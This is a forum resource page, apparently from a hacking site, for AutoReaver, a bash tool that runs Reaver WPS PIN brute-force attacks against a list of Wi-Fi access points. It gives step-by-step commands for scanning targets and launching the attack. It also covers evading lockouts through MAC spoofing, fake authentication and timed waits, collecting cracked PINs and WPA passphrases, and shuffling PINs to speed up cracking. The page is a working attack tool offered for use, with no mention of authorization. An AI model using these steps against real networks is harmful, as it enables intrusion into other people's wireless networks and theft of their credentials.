AutoReaver 1.0

Auto Reaver - multiple access point attack using Reaver

Watchers:
This resource is being watched by 206 members.
  1. Mr. Penguin
    This is bash script which provides multiple access point attack using reaver and BSSIDs list from a text file.
    If processed AP reaches rate limit, script goes to another from the list, and so forth.
    HOW IT WORKS ?

    Script takes AP targets list from text file in following format
    BSSID CHANNEL ESSID
    For example:
    Code:
    Select All
    AA:BB:CC:DD:EE:FF 1 MyWlan 
00:BB:CC:DD:EE:FF 13 TpLink 
00:22:33:DD:EE:FF 13 MyHomeSSID
    And then following steps are being processed:
    • Every line of list file is checked separately in for loop
    • After every AP on the list once, script automatically changes MAC address of your card to random MAC using macchanger (you can also setup your own MAC if you need),
    • Whole list is checked again and again, in endless while loop, until there is nothing to check loop is stopped,
    • Found PINS/WPA PASSPHRASES are stored in {CRACKED_LIST_FILE_PATH} file.
    REQUIREMENTS

    • Wireless adapter which supports injection (see [https://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers Reaver Wiki])
    • Linux Backtrack 5
    • Root access on your system (otherwise some things may not work)
    • AND if you use other Linux distribution*
      • Reaver 1.4 (I didn't try it with previous versions)
      • KDE (unless you'll change 'konsole' invocations to 'screen', 'gnome-terminal' or something like that... this is easy)
      • Gawk (Gnu AWK)
      • Macchanger
      • Airmon-ng, Airodump-ng, Aireplay-ng
      • Wash (WPS Service Scanner)
      • Perl
    USAGE EXAMPLE

    First you have to download lastest version
    Code:
    Select All
    git clone https://code.google.com/p/auto-reaver/
    Go to auto-reaver directory
    Code:
    Select All
    cd ./auto-reaver
    Make sure that scripts have x permissions for your user, if not run
    Code:
    Select All
    chmod 700 ./washAutoReaver chmod 700 ./autoReaver
    Run wash scanner to make a formatted list of Access Points with WPS service enabled
    Code:
    Select All
    ./washAutoReaverList > myAPTargets
    Wait for 1-2 minutes for wash to collect APs, and hit CTRL+C to kill the script. Check if any APs were detected
    Code:
    Select All
    cat ./myAPTargets
    If there are targets in myAPTargets file, you can proceed attack, with following command:
    Code:
    Select All
    ./autoReaver myAPTargets
    ADDITIONAL FEATURES

    • Script logs dates of PIN attempts, so you can check how often AP is locked and for how long. Default directory for those logs is ReaverLastPinDates.
    • Script logs each AP rate limit for every AP (default directory is /tmp/APLimitBSSID), so you can easily check when last rate limit occured
    • You can setup your attack using variables from configurationSettings file (sleep/wait times between AP`s and loops, etc.)
    • You can disable checking AP by adding "#" sign in the beginning of line, in myAPTargets file (then AP will be ommited in loop)
    • (added 2014-07-03) You can setup specific settings per access point.
      To do that for AP with MAC AA:BB:CC:DD:EE:FF, just create file./configurationSettingsPerAp/AABBCCDDEEFF
      and put there variables from ./configurationSettings file that you want to change for example:
      Code:
      Select All
      ADDITIONAL_OPTIONS="-g 10 -E -S -N -T 1 -t 15 -d 0 -x 3";
    so AA:BB:CC:DD:EE:FF will have only ADDITIONAL_OPTIONS changed (rest of variables from./configurationSettings file remains unchanged).
    You can define channel as random by setting it's value (in myAPTargets file) to R, you can force script to automatically find AP channel.
    Example:
    Code:
    Select All
    AA:BB:CC:DD:EE:FF R MyWlan
    But remember that you probably should also increase value of BSSID_ONLINE_TIMEOUT variable - since hopping between all channels takes much more time than searching on one channel.
    REAVER ACTIVITY CHECKER

    This process is responsible for checking whether reaver is active, which means, that is - if it outputs messages similar to: [+] Received M1 message
    during INACTIVITY_TIMEOUT seconds. If it's not, then reaver process is automatically killed by sending INT signal (which equals hitting CTRL+C), reaver session is saved, and another AP is processed.
    CONFIGURATION SETTINGS DESCRIPTION=

    Using file configurationSettings, you can adjust Auto Reaver to your needs.
    Setup your additional reaver options: (type reaver --help for mor information about options)
    Code:
    Select All
    ADDITIONAL_OPTIONS="-E -S -N -T 1 -t 15 -d 0 -x 3";
    since (2014-07-12)
    To set minimum number of minutes between PIN attempts per access point, if AP blocks WPS often, consider to use this option to prevent blocking:
    Code:
    Select All
    MINUTES_WAIT_BETWEEN_PIN_ATTEMPTS=15;
    Set this to 0 if you wan't to see what's going on with AP (signal, beacons...etc),
    1 means that airodump-ng window won't appear
    Code:
    Select All
    NO_AIRODUMP=1;
    Set this to 1 means that additional aireplay-ng (doing fake-auth) isn't started
    or to 0 if you encountered "[!] WARNING: Failed to associate with xx:xx:xx:xx:xx:xx (ESSID: yyyyy)"
    Code:
    Select All
    NO_AIREPLAY=1;
    Delay in seconds between association requests (aireplay-ng fake auth -l option)
    Code:
    Select All
    FAKE_AUTH_DELAY_SECONDS=60;
    Sleep in seconds between checking different AP's (inner loop iteration)
    Notice: "Sleeping between AP's for {SLEEP_BETWEEN_APS}"
    Code:
    Select All
    SLEEP_BETWEEN_APS=5;
    Sleep in seconds before another re-check of whole list (outer loop iteration)
    Notice: "Sleeping before another list re-check for {SLEEP_BEFORE_LIST_RECHECK} seconds"
    Code:
    Select All
    SLEEP_BEFORE_LIST_RECHECK=600;
    Time in minutes during which AP is skipped inside loop because of reach "AP rate limit"
    Notice: "...was blocked less than {LIMIT_WAIT_MINUTES} minutes ago, skipping"
    Code:
    Select All
    LIMIT_WAIT_MINUTES=60;
    Timeout in seconds during script waits for AP to show up in airodump, after that AP is considered offline.
    Notice: "Wait {BSSID_ONLINE_TIMEOUT} seconds... scanning if XX:XX:XX:XX:XX:XX (XXXX) is online"
    Code:
    Select All
    BSSID_ONLINE_TIMEOUT=25;
    SPOOFED MAC (if you want to define your own spoofed mac for wifi card)
    If you leave this empty, MAC will be randomly generated by perl subroutine.
    Code:
    Select All
    SPOOFED_MAC="00:21:6B:B5:E5:22";
    Reaver session files directory
    Code:
    Select All
    REAVER_SESSION_DIR="/usr/local/etc/reaver";
    Temporary directory for autoReaver script (containing some tmp files which are needed).
    Remember that scripts must have write permissions for this dir.
    Code:
    Select All
    TMP_DIR="/tmp/autoReaver";
    Directory with tmp files indicating, that BSSID reached limit of attempts, files are named just like reaver session files. Simply if MAC=AA:BB:CC:DD:EE:FF file name is AABBCCDDEEFF every file is checking if it was modified over last LIMIT_WAIT_MINUTES,
    if it was.. that means AP reached rate limit and will be skipped during the loop:
    Code:
    Select All
    LIMIT_TMP_DIR="$TMP_DIR/APLimitBSSID";
    Directory with last dates of pin checks (if pin was checked, date of check was putted into PIN_DATE_TMP_DIR/BSSID file).
    Better don't set this directory in /tmp/ because it's cleared after reboot, and you loose your pin dates which are required to calculate average time between PINs.
    Code:
    Select All
    PIN_DATE_TMP_DIR=$(pwd)"/ReaverLastPinDates";
    File containing list of cracked access points.
    (If something goes wrong with this file remember you can always recover PIN from session file /usr/local/etc/reaver/{MAC}.wpc.
    First 2 lines of session file are first and second part of PIN.)
    Code:
    Select All
    CRACKED_LIST_FILE_PATH=$(pwd)"/AUTOREAVER_CRACKED_WPS_LIST";
    Activity Checker script checks, if file CHECK_ACTIVITY_FILE was modified before ($NOW - $INACTIVITY_TIMEOUT), then reaver process is killed due to inactivity (probably hanged up, can't associate or something like that),
    CHECK_ACTIVITY_FILE is touched while AP responds with messsages such like: "Received M1-M6"
    Code:
    Select All
    CHECK_ACTIVITY_FILE="$TMP_DIR/autoReaverLastActivity";
    After INACTIVITY_TIMEOUT seconds of inactivity reaver will be killed, and started again with another AP.
    Setting INACTIVITY_TIMEOUT=0 will prevent "Activity Checker" to run.
    INACTIVITY_TIMEOUT=300;
    You should modify this in case you have other interface like ath0 or something else:
    WIRELESS_INTERFACE="wlan0";
    Here you can define your own regexp which if matched - means that Reaver is active
    If you want to be restrictive, you could change this to "Receive WSC NACK", which means that only this message, will be considered as activity.
    Sometimes Reaver outputs only "Received M1" and won't go further, then you should change this to"Received M3".
    This value should depend on specific AP's behavior.
    REAVER_ACTIVITY_PERL_REGEXP="Received M\d+";
    ADDITIONAL TOOLS

    In auto-reaver directory you can find additional tools:
    washAutoReaverList

    Script that will scan network using wash, to search for Access points with WPS service enabled, and generate auto-reaver formatted list like:
    Code:
    Select All
    AA:BB:CC:DD:EE:FF 1 MyWlan 00:BB:CC:DD:EE:FF 13 TpLink 00:22:33:DD:EE:FF 13 MyHomeSSID
    Important: You can always block AP checking by simply adding # sign before each line, as follows:
    Code:
    Select All
    # 00:22:33:DD:EE:FF 13 MyHomeSSID
    so MyHomeSSID will be skipped during list check.
    showPinDates

    Script shows last PIN attempt dates for the certain BSSID
    It depends on PIN_DATE_TMP_DIR variable (see configuration section), from configurationSettings file.
    You can use this tool to adjust setting of LIMIT_WAIT_MINUTES, it should help you discover, for how long certain AP is blocked during AP rate limit.
    Using:
    Code:
    Select All
    ./showPinDates [BSSID] [OPTIONS]
    Example:
    Code:
    Select All
    ./showPinDates AA:BB:CC:DD:EE:FF
    Example output:
    Code:
    Select All
    2014-06-26 06:06:54 2014-06-26 08:06:09 2014-06-26 13:06:08 2014-06-26 14:06:06 2014-06-26 15:06:10
    You can use additional options for grouping PIN dates:
    Example:
    Code:
    Select All
    ./showPinDates AA:BB:CC:DD:EE:FF --group-by-day
    Outputs:
    Code:
    Select All
    Grouping PINs by day 2014-06-23: 24 PINs 2014-06-29: 20 PINs 2014-06-30: 51 PINs
    Options available:
    --group-by-day - Grouping PIN dates, by day and shows PIN count of each day
    --group-by-hour - Grouping PIN hours, by day+hour and shows PIN count of each day+hour
    shuffleReaverSession.pl

    PERL script to shuffle PINs in reaver session file.
    This way you can increase probability of finding correct PIN earlier than using regular pin checking. Usage:
    Code:
    Select All
    ./shuffleReaverSession.pl [REAVER_SESSION_FILE_PATH]
    After execute, script will make a file {YOUR_FILE_NAME}_shuffled.
    Remember to shuffle session before Access Point attack, otherwise you'll loose your old session.
    testShuffledFileAgainstOriginal

    Script purpouse is to test whether shuffled (by shuffleReaverSession.pl script) session file was more effective in finding PIN than the original.
    Remember to test 4 digits
    Code:
    Select All
    *first part of PIN*, which is crucial to find *whole PIN* Usage: ./testShuffledFileAgainstOriginal [FIRST_PART_OF_PIN (4 digits)] [SESSION_FILE] [SHUFFLED_SESSION_FILE] `
    Example:
    Code:
    Select All
    ./testShuffledFileAgainstOriginal 7834 ./AABBCCDDEEFF AABBCCDDEEFF_shuffled